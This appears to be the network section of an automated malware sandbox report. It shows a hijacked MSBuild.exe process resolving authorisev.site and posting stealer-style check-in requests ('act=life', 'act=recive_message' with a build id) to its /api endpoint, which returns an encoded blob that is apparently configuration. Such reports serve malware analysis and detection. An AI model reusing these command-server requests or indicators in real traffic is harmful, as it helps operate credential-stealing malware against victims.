                                                                                                                                                  Nov 1, 2024 10:51:12.963787079 CET49830443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.963821888 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.963896036 CET49830443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.964174986 CET49830443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.964185953 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.972367048 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.972397089 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.972439051 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.972445965 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.972512960 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.972556114 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.974334955 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.974339008 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.974355936 CET49827443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.974359989 CET4434982713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.978518963 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.978594065 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.979895115 CET49826443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.980591059 CET49826443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.980602980 CET4434982613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.982167959 CET49831443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.982184887 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.982327938 CET49831443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.982461929 CET49831443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.982470989 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.983634949 CET49832443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.983674049 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:12.983741999 CET49832443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.983825922 CET49832443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:12.983835936 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.069444895 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.069874048 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.069909096 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.070436001 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.070442915 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.200464964 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.200481892 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.200536013 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.200551033 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.200592041 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.200634003 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.200762987 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.200779915 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.200792074 CET49828443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.200798988 CET4434982813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.203928947 CET49833443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.203962088 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.204031944 CET49833443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.204150915 CET49833443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.204163074 CET4434983313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.618817091 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.619252920 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.619273901 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.619685888 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.619690895 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.691838980 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.692182064 CET49830443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.692198038 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.692559958 CET49830443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.692567110 CET4434983013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.708890915 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.709176064 CET49832443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.709196091 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.709522963 CET49832443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.709530115 CET4434983213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.710819006 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.711085081 CET49831443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.711091995 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.711582899 CET49831443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.711585999 CET4434983113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.754029989 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.754055023 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.754131079 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.754137039 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.754146099 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.754185915 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.754363060 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.754371881 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.754393101 CET49829443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.754396915 CET4434982913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:13.756932020 CET49834443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:13.756958008 CET4434983413.107.246.45192.168.2.4
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 1, 2024 10:50:55.462069988 CET5186853192.168.2.41.1.1.1
                                                                                                                                                  Nov 1, 2024 10:50:55.474848986 CET53518681.1.1.1192.168.2.4
                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Nov 1, 2024 10:50:55.462069988 CET192.168.2.41.1.1.10xbd67Standard query (0)authorisev.siteA (IP address)IN (0x0001)false
                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Nov 1, 2024 10:50:20.456146002 CET1.1.1.1192.168.2.40xfcb3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 1, 2024 10:50:20.456146002 CET1.1.1.1192.168.2.40xfcb3No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 1, 2024 10:50:55.474848986 CET1.1.1.1192.168.2.40xbd67No error (0)authorisev.site104.21.85.194A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 1, 2024 10:50:55.474848986 CET1.1.1.1192.168.2.40xbd67No error (0)authorisev.site172.67.209.143A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 1, 2024 10:50:57.277944088 CET1.1.1.1192.168.2.40x9131No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 1, 2024 10:50:57.277944088 CET1.1.1.1192.168.2.40x9131No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                  • authorisev.site
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.449739104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:50:56 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 8
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:50:56 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                  2024-11-01 09:50:56 UTC550INHTTP/1.1 403 Forbidden
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:50:56 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjjQOQjUQOVK4cOVh2WZh0ToapHd4SyCVl2Tn8KkiQQ96CptCjAlAN7gf5OYvVe4t8qwZbXNwBrVj6rzo5QibK4DyKcXEonuXjIKHOINsGdQT9Ymj2SzkCECE%2F41MpMHtSg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafbc149e26c1c-DFW
                                                                                                                                                  2024-11-01 09:50:56 UTC819INData Raw: 31 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                  Data Ascii: 1154<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                  2024-11-01 09:50:56 UTC1369INData Raw: 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69
                                                                                                                                                  Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
                                                                                                                                                  2024-11-01 09:50:56 UTC1369INData Raw: 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20
                                                                                                                                                  Data Ascii: nt/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input
                                                                                                                                                  2024-11-01 09:50:56 UTC887INData Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                                                                                                                                  Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                                                                                                                                  2024-11-01 09:50:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.449741104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:50:56 UTC352OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 42
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:50:56 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 6b 66 53 35 66 2d 2d 26 6a 3d
                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=MkfS5f--&j=
                                                                                                                                                  2024-11-01 09:50:57 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:50:57 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=njf256ak9tv1qtktsbvuhh92u9; expires=Tue, 25-Feb-2025 03:37:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TArnmlp7puo4LyYBtgh7Uqz5znuvuxLu7sEEA2Ei%2BiOtg11GDIwpyP2%2BOaA%2FV%2FE3iXKinD59zDuMrDXyT7WSJqsyo3VQTYfcYzPrpthPW5gM52sOrWrqHWraInMedai4LBI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafbc648926b89-DFW
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1030&delivery_rate=1768009&cwnd=251&unsent_bytes=0&cid=87acf7f9191600e4&ts=466&x=0"
                                                                                                                                                  2024-11-01 09:50:57 UTC357INData Raw: 34 64 62 0d 0a 2f 59 76 4b 4c 58 76 2b 4a 42 75 73 70 4e 49 74 35 34 48 71 57 78 35 46 2f 2b 62 49 49 4f 41 75 75 46 39 6b 6c 31 36 52 64 35 6d 47 71 62 77 50 51 63 6f 49 4f 64 2f 42 38 42 65 54 38 35 38 2b 4d 6d 65 65 67 75 6f 61 68 6b 2f 55 4c 41 47 37 66 4f 63 61 75 38 66 74 71 30 45 49 6d 77 67 35 79 64 7a 77 46 37 7a 36 79 44 35 77 5a 38 58 45 72 55 71 43 54 39 51 39 42 66 77 78 34 52 76 36 6c 65 65 74 52 52 36 64 51 48 72 41 79 62 64 49 67 75 43 41 4e 58 63 6f 6c 34 76 71 44 4d 4a 4c 77 6e 31 65 74 52 50 30 41 2f 69 77 36 72 6c 47 57 59 4d 49 59 49 37 42 76 41 2f 64 6f 34 73 2b 66 43 6d 5a 67 71 4e 49 69 45 62 63 50 41 44 39 4c 76 67 52 38 5a 58 70 72 6b 51 55 6c 46 52 33 79 73 36 38 54 6f 6a 67 79 48 63 38 49 49 58 45 38 67 4c 52 66 74 6b 73 46 2b
                                                                                                                                                  Data Ascii: 4db/YvKLXv+JBuspNIt54HqWx5F/+bIIOAuuF9kl16Rd5mGqbwPQcoIOd/B8BeT858+Mmeeguoahk/ULAG7fOcau8ftq0EImwg5ydzwF7z6yD5wZ8XErUqCT9Q9Bfwx4Rv6leetRR6dQHrAybdIguCANXcol4vqDMJLwn1etRP0A/iw6rlGWYMIYI7BvA/do4s+fCmZgqNIiEbcPAD9LvgR8ZXprkQUlFR3ys68TojgyHc8IIXE8gLRftksF+
                                                                                                                                                  2024-11-01 09:50:57 UTC893INData Raw: 78 73 32 37 53 70 66 6f 67 54 52 78 4a 35 43 4f 70 55 47 43 53 39 41 33 43 66 38 34 2f 68 6a 39 6e 2b 6e 6f 41 56 6d 62 58 6a 6d 57 68 70 4e 4b 6c 65 53 45 4c 7a 34 64 33 5a 76 6b 57 38 4a 4c 31 6e 31 65 74 54 54 32 46 76 69 55 35 71 74 48 45 6f 35 47 61 38 6a 4c 74 56 32 44 35 6f 59 7a 66 7a 57 58 69 71 78 42 69 30 66 54 4f 41 48 78 66 4c 31 56 2f 49 65 70 38 41 38 34 6b 55 31 31 78 4e 47 77 44 35 71 74 6b 58 6c 37 4b 39 33 63 36 6b 61 44 53 4e 73 35 43 50 73 34 2f 78 50 31 6b 75 61 75 52 52 6d 62 54 48 48 47 78 37 31 45 69 75 4f 4e 4e 48 67 68 6b 59 57 76 41 73 77 4d 33 53 56 47 72 58 7a 64 45 76 69 4e 71 35 31 4d 46 35 4a 42 62 34 37 5a 2f 6c 62 46 35 49 52 35 4a 47 65 54 67 61 56 51 67 31 37 66 4d 78 54 35 4f 66 55 59 2b 4a 48 70 72 55 67 55 6b 6b 42
                                                                                                                                                  Data Ascii: xs27SpfogTRxJ5COpUGCS9A3Cf84/hj9n+noAVmbXjmWhpNKleSELz4d3ZvkW8JL1n1etTT2FviU5qtHEo5Ga8jLtV2D5oYzfzWXiqxBi0fTOAHxfL1V/Iep8A84kU11xNGwD5qtkXl7K93c6kaDSNs5CPs4/xP1kuauRRmbTHHGx71EiuONNHghkYWvAswM3SVGrXzdEviNq51MF5JBb47Z/lbF5IR5JGeTgaVQg17fMxT5OfUY+JHprUgUkkB
                                                                                                                                                  2024-11-01 09:50:57 UTC1369INData Raw: 33 66 39 31 0d 0a 64 6b 55 6c 77 78 38 2b 69 52 59 6e 74 6d 6a 52 32 49 70 4f 49 72 30 32 43 54 64 73 7a 44 50 35 38 76 56 58 38 68 36 6e 77 44 7a 61 52 56 6d 76 45 7a 61 45 4e 73 4f 43 47 4e 33 73 78 33 5a 76 6b 57 38 4a 4c 31 6e 31 65 74 54 66 31 47 66 65 66 37 37 70 42 46 6f 35 4d 61 38 72 49 74 45 4f 4c 36 6f 55 32 65 54 57 5a 68 4c 68 44 68 30 76 55 4d 42 54 77 66 4c 31 56 2f 49 65 70 38 41 38 6a 71 45 46 70 33 38 48 79 65 6f 62 74 68 6a 35 71 5a 34 4c 4b 73 77 4b 46 51 4a 70 6c 52 76 59 77 2f 68 7a 2b 6b 50 75 69 51 78 69 4f 51 58 44 48 7a 4c 46 42 69 75 69 45 50 47 34 73 6b 6f 79 6c 51 34 39 42 30 54 6b 47 74 58 4b 7a 45 75 50 66 73 65 68 75 46 4a 4e 55 65 74 2b 45 68 55 79 4c 37 59 38 76 50 44 6a 54 6e 65 70 46 6a 67 79 43 66 51 66 35 4d 50 49 61
                                                                                                                                                  Data Ascii: 3f91dkUlwx8+iRYntmjR2IpOIr02CTdszDP58vVX8h6nwDzaRVmvEzaENsOCGN3sx3ZvkW8JL1n1etTf1Gfef77pBFo5Ma8rItEOL6oU2eTWZhLhDh0vUMBTwfL1V/Iep8A8jqEFp38Hyeobthj5qZ4LKswKFQJplRvYw/hz+kPuiQxiOQXDHzLFBiuiEPG4skoylQ49B0TkGtXKzEuPfsehuFJNUet+EhUyL7Y8vPDjTnepFjgyCfQf5MPIa
                                                                                                                                                  2024-11-01 09:50:57 UTC1369INData Raw: 39 45 45 70 68 43 65 63 50 4e 76 6b 47 4d 37 34 41 31 65 7a 57 51 67 61 4a 49 69 30 6e 57 4d 41 58 6e 50 2f 4a 56 74 64 2f 75 73 41 39 42 33 47 46 4b 2b 65 58 77 55 4d 76 36 79 44 35 77 5a 38 58 45 71 30 71 46 51 74 34 76 43 4f 63 79 39 42 58 39 6c 2b 47 76 51 78 65 53 56 48 48 50 78 72 35 41 6a 65 71 4d 4f 48 67 6a 6b 59 50 71 44 4d 4a 4c 77 6e 31 65 74 52 54 77 44 2b 48 64 78 36 4e 50 48 6f 78 51 59 6f 37 5a 2f 6c 62 46 35 49 52 35 4a 47 65 5a 6a 36 42 4c 67 55 58 65 4d 41 62 38 4d 2f 6f 64 39 70 66 37 71 55 55 4c 6d 45 4e 34 77 63 79 30 52 34 6e 73 68 44 31 75 4c 4e 33 4b 36 6b 57 61 44 49 4a 39 4a 76 34 71 30 41 66 70 33 2f 62 6d 56 6c 6d 62 53 6a 6d 57 68 72 6c 44 68 4f 4b 43 50 33 63 69 6b 49 53 76 53 49 56 41 32 6a 30 46 38 7a 72 2b 48 66 4f 54 35
                                                                                                                                                  Data Ascii: 9EEphCecPNvkGM74A1ezWQgaJIi0nWMAXnP/JVtd/usA9B3GFK+eXwUMv6yD5wZ8XEq0qFQt4vCOcy9BX9l+GvQxeSVHHPxr5AjeqMOHgjkYPqDMJLwn1etRTwD+Hdx6NPHoxQYo7Z/lbF5IR5JGeZj6BLgUXeMAb8M/od9pf7qUULmEN4wcy0R4nshD1uLN3K6kWaDIJ9Jv4q0Afp3/bmVlmbSjmWhrlDhOKCP3cikISvSIVA2j0F8zr+HfOT5
                                                                                                                                                  2024-11-01 09:50:57 UTC1369INData Raw: 5a 54 6e 4c 49 79 4c 46 4a 69 65 37 49 64 7a 77 67 68 63 54 79 41 71 56 57 31 7a 73 52 35 41 6e 30 46 61 72 66 39 75 5a 57 57 5a 74 4b 4f 5a 61 47 76 55 4f 50 37 6f 30 39 64 43 43 65 68 61 5a 47 6a 30 48 65 4e 41 4c 77 4c 75 45 54 39 5a 2f 6d 70 6b 41 56 6a 6b 68 38 7a 73 72 77 41 63 58 6b 6b 48 6b 6b 5a 36 79 54 71 67 4b 64 41 73 4e 39 41 66 6c 38 71 31 58 30 6b 76 75 6b 51 42 6d 64 52 58 33 46 77 62 5a 4a 68 4f 43 4e 4f 6e 6b 68 6e 49 53 6d 53 49 56 45 30 44 4d 4c 38 7a 6a 31 45 37 76 52 71 61 39 58 57 63 51 47 53 38 50 49 75 55 79 44 37 70 34 52 54 57 65 43 79 72 4d 43 68 55 43 61 5a 55 62 78 4e 2f 73 5a 2f 70 66 73 71 55 63 54 6c 45 6c 32 33 4d 65 2f 52 6f 4c 6f 68 54 5a 79 49 70 4f 57 72 55 6d 4a 52 4e 4d 7a 41 4c 56 79 73 78 4c 6a 33 37 48 6f 65 52
                                                                                                                                                  Data Ascii: ZTnLIyLFJie7IdzwghcTyAqVW1zsR5An0Farf9uZWWZtKOZaGvUOP7o09dCCehaZGj0HeNALwLuET9Z/mpkAVjkh8zsrwAcXkkHkkZ6yTqgKdAsN9Afl8q1X0kvukQBmdRX3FwbZJhOCNOnkhnISmSIVE0DML8zj1E7vRqa9XWcQGS8PIuUyD7p4RTWeCyrMChUCaZUbxN/sZ/pfsqUcTlEl23Me/RoLohTZyIpOWrUmJRNMzALVysxLj37HoeR
